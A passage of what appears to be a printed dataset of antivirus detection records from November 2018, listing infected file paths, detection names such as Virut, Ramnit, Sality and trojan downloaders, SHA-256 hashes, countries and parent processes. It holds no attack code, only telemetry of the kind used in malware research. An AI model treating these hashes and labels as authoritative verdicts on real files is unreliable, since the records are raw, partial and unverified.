  Row(detection=Row(filename='tmp0023f48a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f48a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:16:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297aa9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297aa9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:54:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203527-eaee5c46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203527-EAEE5C46', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:35:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\Program Files (x86)\\csduragi\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='ad6085ca76f8437f036c994f75b3532ffedbb8d8eb2548e43c3b0f7d644e50d0', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T15:35:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205338-b8ceafdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205338-B8CEAFDB', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d9952fadc5c646678a30a6b3c3afee30a38890a7c80f1e5dede1cf834b605991', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-04T14:47:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f_01df9e', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_01df9e', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='f67e5e25e496610e518f3c06663d347ad5ff0106198db5460f74ae0d713e2238', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-04T20:21:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ec89', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ec89', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:07:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202158-baf3fdf5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202158-BAF3FDF5', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:21:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123406-8cda2622', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4c5c490b\\AVSCAN-20181104-123248-827E3ACE\\AVSCAN-20181104-123406-8CDA2622', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='fcdf5a9f4e7b44652cfc35ed167a2989a7ebed9ebba43dfbe135352ae1ce071a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:34:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:00:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:33:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T04:54:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mohaa_server.exe', filepath='\\?\\J:\\Medal of honor\\MOHAA_server.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='fa467470419e316021cf5e2b3d3b7cce5a94667e60edf66faaf95a6daac19be9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp002527d1', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp002527d1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:47:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f4b808f543ea5f7cdc9bd73eed5b6b80a1eed6d176305b3e6f6538aa53744b31', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F4B808F543EA5F7CDC9BD73EED5B6B80A1EED6D176305B3E6F6538AA53744B31', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f4b808f543ea5f7cdc9bd73eed5b6b80a1eed6d176305b3e6f6538aa53744b31', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:11Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='hotring_furio_night.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\hotring_furio_night\\hotring_furio_night.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='056c0d34060e60a6dde86d63d3dd304b135fabc7ee57bb839c6c388c9325fa16', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='igxpco32.dll', filepath='\\\\?\\C:\\Drivers\\Video\\Intel1\\HD1\\igxpco32.dll', filesize=492000, name='W32/Ramnit.C.#M1.#R1'), hash='07be1f33ce35a1f07cf1bd9107deebf722461178692e36d8ebe6dd926ad29630', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:37:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='level14.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\LEVEL14.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='27e946580ebd3a67750c862d3cce6b9573f1e3e495ebccfe9a67f563208fdf59', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0004d2b8', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0004d2b8', filesize=6144000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='34f8121af01718e8f825b72cdc5205f4048ae3f29a6be7bb917d589c2d8a831d', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:50:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\setup.exe', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T15:29:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150732-a9d5263a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_38c697ad\\AVSCAN-20181102-145422-44E8A08C\\AVSCAN-20181102-150732-A9D5263A', filesize=1132000, name='PUA/Dlhelper.Gen7.#M300.#R601597'), hash='2a6cf33ead307d9e2823a323aa11ce008a616f298d880e03ee1f61f8943070a7', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:07:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183710-0588562b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8518b6c\\AVSCAN-20181102-183700-03DFF39F\\AVSCAN-20181102-183710-0588562B', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:37:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='curriculo de richard eladio.exe', filepath='D:\\RESPALDO 12-12-2010\\MIS TRABAJOS\\curriculo de richard eladio.exe', filesize=840000, name='W32/Sality.Y.#M1.#R1'), hash='49724b1135be58bdba9c3a76f7969913d9dd78a88429d312b2d0b2b50f965a22', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T19:13:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T03:39:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T07:16:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='phantompdf.bat', filepath='C:\\Users\\X\\Foxit Software\\Foxit PhantomPDF\\PhantomPDF.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-200413-013bfc0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b260ec48\\AVSCAN-20181102-200252-F5ED1D76\\AVSCAN-20181102-200413-013BFC0A', filesize=1536000, name='PUA/AD.BitcoinMiner.B.#M1.#R1'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:04:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='textures.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL13\\TEXTURES\\TEXTURES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='27e946580ebd3a67750c862d3cce6b9573f1e3e495ebccfe9a67f563208fdf59', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T12:05:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8085332\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Download IDM 6.30.10.rar_0200058725.exe', parentsize=2485340, timestamp='2018-11-02T11:16:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183810-0f6d0d1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8518b6c\\AVSCAN-20181102-183800-0DC3154C\\AVSCAN-20181102-183810-0F6D0D1F', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:38:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cfp.exe', filepath='C:\\Users\\X\\Desktop\\Miracle Box crack 2.54 free 2018\\Miracle Box crack 2.54 free 2018\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='4aa835632e3b4fbe2f82441f5e38bb1cad962cf0569cf46b1344fc3bb2a0642c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T20:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T05:07:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134402-94b25cc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134402-94B25CC3', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='\\?\\C:\\Program Files\\Yahoo!\\Messenger\\UNWISE.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='37f0e3a8f4c15081ee008edae018c2704703a0dbab00136763d4de86b0e834d9', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:13:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwr_workspace_ws_042.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_API\\dwr_workspace_ws_042.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='15f915639c51036e955a3c1151c5a07979d4164f31a01b04f9405e5bb7e54b84', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-02T07:05:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:55Z'), dt=datetime.date(2018, 11, 2)),
